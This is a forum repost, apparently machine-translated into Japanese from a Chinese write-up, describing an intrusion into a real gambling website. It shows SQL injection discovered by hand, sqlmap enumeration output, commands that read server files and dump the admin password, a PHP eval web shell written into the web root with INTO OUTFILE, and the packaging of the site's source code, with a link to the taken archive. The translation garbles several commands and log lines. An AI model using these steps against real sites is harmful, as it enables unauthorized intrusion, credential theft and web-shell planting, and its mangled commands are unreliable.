Jump to content

0x00はチェスとカードのウェブサイトに遭遇します

1。単純なパケットキャプチャ分析

图片

图片

2.ユーザー名に単一の引用符を追加すると、エラーが直接報告されます。閉じた後、それは正常です。 SQLに着実に注入します。

3.テスト後、セキュリティデバイスは見つかりませんでした。SQLMAPに移動します。

4.プロセスはやり過ぎではありません。次のデータを取得するだけです

Current-User:開発者@%

@@beadir: '/usr/'を選択します

select user(): 'developer@121.x.x.x'

データベース(): 'edc'を選択します

System_user(): 'developer@121.x.x.xを選択

@@ Character_Sets_dir: '/usr/share/mysql/charsets/'を選択

@@ Character_set_client: 'utf8'を選択

@@datadir: '/var/lib/mysql/'を選択

@@ Character_set_server: 'latin1'5を選択します。情報収集の波を通じて、現在のユーザー許可は非常に低く、有用な情報はほとんどありません

6.ターゲットポートをスキャンして、かなり多くのポートが開いていることがわかりました。

图片

7.ページなしでポート80を開きます

图片

ポート888は、Apacheのデフォルトのホームページです。絶対パス/var/www/html/

ポート9090は、ギャンブルステーション管理ログインアドレスです

ポート9091はギャンブルステーションメンバーのログインアドレス图片です

图片

8。テスト後、これらの2ページで利用できる脆弱性はありません。

0x01ブレークスルーポイント

1。ディレクトリをスキャンすることにより、エラーページが見つかり、注入ポイントを取得し、info.phpを取得します

图片

图片

2。データベースのルートアクセス許可を取得します

图片

db_test現在のデータベース

[19:54:48] [情報] Resumed: 'root'@'localhost'

[19:54336048] [情報] Resumed: 'Developer'@'localhost'

[19:54:48] [情報] Resumed: 'root'@'127.0.0.1'

[19336054:48] [情報] Resumed: 'syncopy'@'222.xxx.xxx.xxx'

[19:54336048] [情報] Resumed: 'MLH'@'LocalHost'

[19336054:48] [情報] Resumed: 'Developer'@'%'

[19336054:48] [情報] Resumed: 'MLH'@'%'

[19336054:48] [情報] Resumed: 'edc'@'%'

[19:54:48] [情報] Resumed: '6hc_nav'@'%'

图片

0x02シェルに書き込みます

1。SQLステートメントを介してシェルに書き込むことは成功していません。積み重ねられたクエリの場合にのみ、quEries以外のSQLステートメントを実行できます

sqlmap -sql-shell

'?php eval($ _ post [' x ']);'を選択しますInto Outfile '/var/www/html/25u_ft/1.php' 图片

2。別の方法で書いてください

-file-write '/localhost/shell.php' ---file-dest '/var/www/html/25u_ft/test.php'3。書くことはまったく不可能です。書き込み許可がなく、許可のみがあることがわかりました

-file-read '/var/www/html/25u_ft/info.php'4。正常に読み取ることができ、構成ファイルを読み取ろうとした後、エラーパスに乗り出しました

图片

图片

(1)私はいくつかの構成ファイルを読みました、そして私は知らない

(2)戻って管理者のパスワードを挿入し、背景からシェルを取得してみてください

-d '10fenft' -t 'g_user' -c 'g_name、g_password' - dump 图片

(3)バックグラウンドに正常にログインします

图片

图片

(4)アップロード機能のない単純な背景のグループ

0x03 getShell

1。必要な条件がある場合は、シェルを取得できません。これは非常に不快です。

2。さまざまなチャネルを介してこのIPをクエリし、突然、ドメイン名が以前に解決されたことがわかりました。

图片

3.素晴らしい、ドメイン名は正常にアクセスできます、それはフォーラムです

图片

4.それはThinkphpであることが判明し、絶対的なパスも明らかにされました

5。以前の書き込み操作を繰り返すとすぐに成功します、ハハハハ

图片

0x04パッケージソースコード

1。シェルへの直接リンク

图片

2。権限は高くありませんが、パッケージングソースコードにはまったく影響しません。

图片

0x05要約

同じタイプのサイトがたくさんあることがわかりました

ソースコードは以下に配置されています

https://xzfile.aliyuncs.com/upload/affix/20210513165936-8aadc29a-b3c9-1.rarは、元のリンクから再現されています。 https://mp.weixin.qqc.com/s?__biz=mzg2ndawmda1na=mid=2247486232Idx=1SN=301810A 7BA60ADD83CDCB99498DE8125CHKSM=CE67A181F9102897905FFD677DAFEB90087D996CD2E7965 300094BD29CBA8F68D69F675829BESCENE=21#WECHAT_REDIRECThttps://XZ.ALIYUN.COM/T/9567

0 Comments

Recommended Comments

There are no comments to display.

Guest
Add a comment...